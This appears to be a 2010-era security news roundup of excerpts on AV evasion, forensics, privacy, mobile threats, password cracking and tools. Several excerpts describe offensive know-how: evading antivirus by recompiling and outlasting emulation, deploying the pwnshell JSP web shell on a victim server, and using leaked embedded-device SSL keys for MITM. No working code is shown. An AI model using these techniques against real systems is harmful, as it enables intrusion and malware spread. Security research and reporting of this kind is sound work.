Avoiding AV Detection  [spareclockcycles.org]
As a follow-up to my post on the USB Stick O' Death, I wanted to go a little more in depth on the subject of AV evasion. Following my release of (some of) my code for obfuscating my payload, it became apparent that researchers at various antivirus companies read my blog (Oh hai derr researchers! Great to have you with us! I can haz job?) and updated their virus definitions to detect my malicious payload. To be perfectly honest, I was hoping this would happen, as I figured it would be a teachable moment on just how ineffective current approaches to virus detection can be, give readers a real world look at how AV responds to new threats, and provide one of the possible approaches an attacker would take to evading AV software. My main goal in this research was to see how much effort it would take to become undetectable again, and the answer was 'virtually none'.
In this post, I will first look at how I was able to evade detection by many AV products simply by using a different compiler and by stripping debugging symbols. Then, I will look at how I was able to defeat Microsoft's (and many other AV products') detection mechanisms simply by 'waiting out' the timeout period of their simulations of my program's execution. However, a quick note before we begin: I'm by no means an expert on antivirus, as this exercise was partly to further my understanding of how AV works, and these explanations and techniques are based on my admittedly poor understandings of the technologies behind them. If I mistakenly claim something that isn't true, or you can shed light on some areas that I neglect, please comment. I would love to learn from you.

 
The purpose of this article is to explore the many different forensic artifacts that can be discovered from Windows prefetch files. The first section will briefly cover the prefetch file and the prefetching process. The second section, will discuss the forensic values of the prefetch file, specifically the forensic artifacts the prefetch file contains, and the story that can be revealed by the mere existence or absence of prefetch files. The article will conclude with some examples of how you can use prefetch files to aid in forensic analysis and what to watch out for when using prefetch files to prove or disprove a case.
The main purpose of this article is to explain the use of prefetching in forensic analysis, but it is important to have a baseline understanding of the technology to provide a good foundation for how and why prefetch files contain certain artifacts. The prefetching process utilized by Microsoft was created to speed up the Windows operating system and application startup. The prefetching process occurs when the operating system, specifically the Windows Cache Manager, monitors certain elements of data that are extracted from the disk into memory. This monitoring occurs each time the system is started for the first two minutes of the boot process, then sixty seconds after all the Win32 services have completed their startup, and the first ten seconds after an application is executed.

 
Dstat is a versatile replacement for vmstat, iostat, netstat and ifstat. Dstat overcomes some of their limitations and adds some extra features, more counters and flexibility. Dstat is handy for monitoring systems during performance tuning tests, benchmarks or troubleshooting.
Dstat allows you to view all of your system resources in real-time, you can eg. compare disk utilization in combination with interrupts from your IDE controller, or compare the network bandwidth numbers directly with the disk throughput (in the same interval).




Cloud Security


 
The Cloud Security Alliance's matrix is a controls framework that gives a detailed understanding of security concepts and principles that are aligned to the CSA's 13 domains
The Cloud Security Alliance (CSA) has launched a revision of the Cloud Controls Matrix (CCM). The new matrix (version 1.1), available for free download here, is designed to provide fundamental security principles to guide cloud vendors and help prospective cloud customers assess the overall security risk of a cloud provider.
The matrix provides a controls framework that gives a detailed understanding of security concepts and principles that are aligned to the CSA's 13 domains. The foundations of the CCM rest on its customized relationship to other industry-accepted security standards, regulations, and controls frameworks such as ISO 27001/27002, ISACA COBIT, PCI, and NIST. The latest version includes more thorough mapping around NIST and GAAP, as part of more 'holistic guidance', according to CSA.

 
Malware Persistence in the Cloud  [fasthorizon.blogspot.com]
The cloud is certainly going to change some things about malware infection. When a desktop is reset to clean state every time an employee logs in, you now have to wonder how malicious attackers are going to maintain persistent access to the Enterprise. This is similar to what happens when an infected computer is re-imaged only to end-up infected all over again.
There are several ways to maintain persistent access without having an executable-in-waiting on the filesystem. Memory-only based injection is an old concept. It has the advantage of defeating disk-based security. One common observation is that such malware doesn't survive reboot. That is true in the sense that the malware is not a service or a driver - but this doesn't mean the malware will go away. Stated differently, the malware can still be persistent even without a registry key to survive reboot. This applies to the problem of re-infection after re-imaging (a serious and expensive problem today in the Enterprise) and it also applies to the future of cloud computing (where desktop reset is considered a way to combat malware persistence).




Privacy


 
I love Pandora. I really couldn't do without it. But I could do without its sending my demographic information, phone ID, and location to eight trackers across six companies. And Pandora's far from the worst offender, the WSJ shows us.++
The Journal's report lays bare much of what we already suspected, or outright knew but didn't bother thinking about: iOS and Android apps are having a field day with your personal info. More than half of the 101 popular apps they tested sent your UDID to companies without your awareness or consent. Nearly as many sent your location, and a handful even sent along demographic info and other personal details to advertisers.

 
Court Rebuffs Obama on Warrantless Cell-Site Tracking
A federal appeals court on Wednesday rejected the Obama administration's contention that the government is never required to get a court warrant to obtain cell-site information that mobile-phone carriers retain on their customers.
The decision by the 3rd U.S. Circuit Court of Appeals is one in a string of court decisions boosting Americans' privacy (.pdf) in the digital age - rulings the government fought against




Mobile Security


 
ENISA Smartphone Security Report  [1raindrop.typepad.com]
Here is a new Smartphone Security report from ENISA that I contributed to -
'A new ENISA report identifies the top security risks and opportunities of smartphone use and gives practical security advice for businesses, consumers and governments. Top risks include spyware, poor data cleansing when recycling phones, accidental data leakage, and unauthorised premium-rate phonecalls and SMSs.'

 
As more people adopt smartphones, criminals will find new ways to use them for no good
Smartphones could soon be used to launch distributed attacks, much like traditional PCs are now used as parts of larger botnet networks, according to a new report from ENISA, the European Network and Information Security Agency. In research that details the many risks of smartphones, the findings claim that while the devices are not currently being targeted for such attacks, this may change as mobile devices are becoming more popular, more connected and the complexity and the number of vulnerabilities in these platforms is increasing.

 
Apple pulls jailbreak detection from iOS 4, and InfoWorld catches Androids that lie about Exchange policy support -- so what can IT trust?
Much of security is built on trust, but it turns out you can't always believe a mobile device's claims. They can be programmed to lie about their capabilities, as in the case of several Android devices, as well as jailbroken iPhones and iPads. Thus, they can appear to conform to IT security policies managed via Microsoft's Exchange ActiveSync (EAS) protocol even when they don't. Two recent events show that trust may be misplaced in the mobile world.
Last week, Apple quietly dropped its jailbreak detection capability from iOS 4's APIs, so iPhones and iPads can't report whether they've been jailbroken. (Apple did not comment.) Jailbreaking, although legal, can compromise a device, allowing malware and worse into the corporate network. Indeed, the few reported cases of
iPhone viruses have occurred on jailbroken units.

 
Android Touch-Event Hijacking  [blog.mylookout.com]
With the recent release of Android 2.3 (Gingerbread), developers can now protect themselves from a new twist on an old bug: TapJacking. Like ClickJacking on the web, TapJacking occurs when a malicious application displays a fake user interface that seems like it can be interacted with, but actually passes interaction events such as finger taps to a hidden user interface behind it. Using this technique, an attacker could potentially trick a user into making purchases, clicking on ads, installing an application, granting permissions, or even wiping all of the data from their phone.

 
Messing with Droid X  [www.secmaniac.com]
I just got a Droid X last week, before getting it I made sure efuse (https://secure.wikimedia.org/wikipedia/en/wiki/EFUSE) was bypassed or it wouldn't be fun having a stock Android. I'll outline the steps I've taken so far to customize my themes, root my droid, fix the market, overclock, and more. I'm going to simplify most of these for apps that are already out in the market now, I decided to do mine from scratch but makes posting a lot easier.
First things first, lets get root on the Droid X. The easiest way I found was using adb shell. Before diving down, read up on adb, its really easy... It's a direct interface with your Droid and you can download the SDK packages from Google.
Great tutorial on rooting the Droid X: http://www.simplehelp.net/2010/10/11/how-to-root-your-droid-x-using-os-x/
Simplistic terms, put your Droid X into debugging mode under settings and applications, fire up the shell script through ADB and your running as root.




Cryptography / Encryption


 
Karsten Nohl of Security Research Labs, a white-hat hacker, believes that a recent spike in car theft is due to a break in the car immobilizer security systems; thieves are able to re-mobilize the immobilized vehicles. My question is: how long until someone builds a TV-B-Gone for car engines that lets you stop cars with the click of a button?

 
Some time ago, I started thinking about the possibility of using Rainbow Tables to crack old-school Unix crypt(3) passwords. Nobody had done this, and the reason most often cited was the presence of the two-character salt at the beginning of the hash.
This didn't make a whole lot of sense to me. I mean, 2 characters? Isn't that essentially like taking an 8-character password space and making it a 10-character space? People are already creating 10-character tables for other hash algorithms. Why can't we do this for crypt(3)?
Turns out, it's not that difficult. Over a few nights, I managed to work some rough hacks into the source for linuxrainbowcrack, and it seems like it's working. I haven't actually built a set of tables (other than small test tables) because I'm sure the code could be better optimized, and I simply don't have the horsepower. But I'm hoping that others can both optimize the code, and generate and distribute tables.




General


 
In 2003, George Mason University PhD candidate Sean Gorman mapped critical fiber optic networks across the U.S. and illustrated that vulnerabilities in the communications infrastructure could easily be identified using data and records available to the general public.
The study also concluded that there are multiple 'choke points' that could be targeted which would cripple Internet functionality, and revealed the lack of redundant systems that would ensure continued operability.
Now Swiss researchers suggest that Internet backbones are unduly susceptible to attack, which potentially cripple critical communications and infrastructure operations.

 
Thanks to database breaches like those suffered by RockYou and Gawker, leaked passwords on Pastebin, and password caches stored in Malware like Conficker, the criminals of the world have an impressive starting point to guessing your passwords.

 
According to Techspot (Thanks Richard!), Intel's new Core processors (Sandy Bridge), that will hit the market for desktops and laptops early 2011, have a remote kill switch (called Anti-Theft v3.0). This technology embedded in the CPU allows the user to remotely disable the processor through 3G, that is, even when the computer is not connected to the Internet or it switched off.
Intel's goal is to offer the user the capability to shut down remotely the computer if it is lost or stolen. Somehow, this is similar to what most modern mobile device platforms offer today to remotely lock, show a message, or wipe a stolen or lost device, such as Windows Mobile 6.5, iPhone, iPad... I guess that, in any case, the thief will be able to replace the CPU with a new one and make the computer work again. Will be Intel planning to add remote disk wiping capabilities from the processor too? ;)

 
Google has started warning users when they are about to visit web sites which may have been hacked. Google has long warned users when search results include sites which spread malware and now plans to detect web sites which may have been hacked, without the owner's consent, for purposes such as phishing or spamming.

 
from the nike-picks-up-the-RIAA-strategy dept
Warning: you might not want to ever buy Nike shoes again. If you accidentally buy a counterfeit pair of shoes, Nike might sue you. Via Glyn Moody, we learn that Nike chose to sue a guy who ordered a single pair of trainers online, believing they were legitimate Nike shoes. The shoes were seized at the UK border as counterfeits. Nike could have gone after the actual counterfeiters. Or it could have (perhaps more questionably) gone after some other third parties, such as the retailers who sold the shoes. Instead, it chose option 3 and sued the buyers directly. Most of the suits were settled (or, apparently, ignored).

 
If you're an avid Skype user, you're probably aware that Skype's been suffering downtime today. They've updated their blog with more details (in short, supernodes went down, so they're creating new mega-supernodes-obviously), but it's likely going to be a few more hours before your Skype account is back up and running. It's got to be bad timing for Skype (and Skype users), considering the amount of video calling I'm sure goes on during the holidays. (I just video chatted my family last night.)

 
Riptides can carry hapless swimmers out into the ocean very quickly - by the time a lifeguard is able swim out to rescue them, it may be too late. Using a Jet Ski to reach struggling swimmers is one option, although such watercraft can be expensive, problematic to store on-site, and difficult to launch for one person. Now, seaside municipalities can get something cheaper and easier for reaching those swimmers-in-distress: an electric remote-control motorized rescue buoy called EMILY.




Tools


 
VMware Fusion 3.1  [store.vmware.com]
Enjoy the Holiday Season with VMware Exclusive Deals!
Get 15% OFF VMware Fusion 3 and $30 Rebate. The price drops from $79.99 to $37.99 after Rebate.
Offer valid through Jan 7th 2011 @ 5:00 PM (PST), Act Now!

 
Samurai 0.9.5 released  [sourceforge.net]
The Samurai Web Testing Framework is a LiveCD focused on web application testing. We have collected the top testing tools and pre-installed them to build the perfect environment for testing applications

 
web.config Security Analyzer  [www.wcanalyzer.com]
Analyze your web.config file against security vulnerabilities.

 
littleblackbox  [code.google.com]
Database of private SSL keys for embedded devices
LittleBlackBox is a collection of thousands of private SSL keys extracted from various embedded devices. These private keys are stored in a database where they are correlated with their public SSL certificates as well as the hardware/firmware that are known to use those SSL keys.
A command line utility is included to aid in the identification of devices or network traffic that use these known private keys. Given a public SSL certificate, the utility will search the database to see if it has a corresponding private key; if so, the private key is displayed and can be used for traffic decryption or MITM attacks. Alternatively, it will also display a table of hardware and firmware that is known to use that private key.

 
INSECT  [www.insecurityresearch.com]
INSECT Pro is a penetration security auditing and testing software solution designed to allow organizations of all sizes mitigate, monitor and manage the latest security threats vulnerabilities and implement active security policies by performing penetration tests across their infrastructure and applications.
INSECT can help to build a strong security posture that is easy to use so both professional penetration testers and less experienced security pros will have all the tools they need to reduce costs, proactively find vulnerabilities, assess risk, and check the effectiveness of security defenses.

 
New sshttp feature trickery  [c-skills.blogspot.com]
sshttp is now able to hide SSH inside HTTPS as well.
SSH behind HTTP was possible before, and so was HTTPS,
but now it is 'official' :)
You cannot mix HTTP and HTTPS in the same instance,
but you can run multiple sshttpd's.

 
I just completed a pretty massive update of the Backtrack 4 Full Disk Encryption How-to.

 
d0z.me: The Evil URL Shortener  [spareclockcycles.org]
The Inspiration
I, like many people, have been closely following a lot of the chaos happening around the recent Wikileaks dump, and was particularly fascinated by the DDoS attacks by activists on either side. One tool specifically caught my eye in the midst of the attacks, however: the JS LOIC. The tool works simply by constantly altering an image file's source location, so that the browser is forced to continuously hammer the targeted server with HTTP requests. Not a sophisticated or technically interesting tool by any means, but conceptually interesting in that it only requires a browser to execute one's portion of a DoS attack. While the concept itself is not all that new, it got me thinking about the implications of such browser based DoS attacks. Clearly, it opens the door for the creation of a DDoS botnet without ever having to actually exploit the hosts participating in the network; all that is required is to get some Javascript to run in the participants' browsers.

 
Malwarebytes' Anti-Malware 1.50.1  [forums.malwarebytes.org]
Malwarebytes' Anti-Malware 1.50.1 has been released. This version is a bugfix release, and fixes a number of minor stability issues in the 1.50 release build. If you had issues with 1.50, please let us know if 1.50.1 resolves them.

 

 
ProcDump v3.01  [technet.microsoft.com]
ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. ProcDump also includes hung window monitoring (using the same definition of a window hang that Windows and Task Manager use), unhandled exception monitoring and can generate dumps based on the values of system performance counters. It also can serve as a general process dump utility that you can embed in other scripts

 
pwnshell  [i8jesus.com]
If you've got arbitrary file uploads to a J2EE web accessible directory, you need something to maximize your compromise. The world needs a JSP shell that really helps a blackbox attacker pivot to important assets, so I took a stab at it. It's called quite lamely called pwnshell. It's a single JSP that, when browsed to, delivers the user a Web 2.0 shell for the victimized server. Great for demos! The shell is here.
How do you use it?
1. Upload it to the victim server (try it on a local Tomcat server!)
2. Browse to it
3. Pretend you're on looking at xterm

 
Download Armitage 12.22.10  [www.fastandeasyhacking.com]

 
Cisco ACL Parser v0.04  [www.melcara.com]
Here is a new version of the ACL parser. I fixed a lot of issues with this script. The object groups are now expanded for the PIX and ASA. I have added the attributes for ACL entries for log level, time, and inactive state. I enhanced the remark feature also. The script was verified and test by Anthony, who contacted me after my initial public release v2. Anthony ran the script against an ASA 7.x with ACL that totals over 5000 lines. Here a quote from his response after testing:
"This is truly a parsing masterpiece. This did exactly what I needed and meets all of my requirements perfectly. Had no issues with any of the lines in the over 5000 lines of a single ACL that I ran through it, wonderful! Save me days of work! Seriously!!! Thanks a million. I know this wasn't easy... especially since your script more than doubled!!"

 
Rebasing the dynamic linker DYLD to improve Snow Leopard's fake ASLR
INTRODUCTION
Last week at the Power of Community 2010 (POC2010) security conference in Seoul Charlie Miller presented his talk about the changes in Snow Leopard security. An important message of his talk was that Apple's failure to load the dynamic linker DYLD at a random base address is a major weakness from a security point of view. Charlie demonstrated how a ROP payload can be build that only uses parts of the not randomized DYLD binary. You can download his slides here.
At the same conference I presented my research into adding ASLR to jailbroken iPhones which also mentioned the fact that there are several similarities between iOS and Mac OS X Snow Leopard in regards to the DYLD and the dyld_shared_cache. I also mentioned that not rebasing the DYLD binary is a major weakness because it consists enough code to kickstart shellcode with a ROP stub based on DLYD only. Therefore it was pretty straight forward to just apply my research into rebasing the DYLD binary from iOS to Mac OS X Snow Leopard, which is presented here. You can download my slides here and the antid0te iPhone security tool will be available here once it is released.

 
This weekly update for Metasploit Pro and Metasploit Express 3.5.1 brings three new modules, and updates to the pcap import and nexpose functionality.




Funny


 
Software Engineering explained  [alexandre.gramfort.net]

 
What shall we call it?  [www.downrightaverage.com]

 
Don't leak on me  [yfrog.com]

 
Jiu Jitsu  [www.stevekwan.com]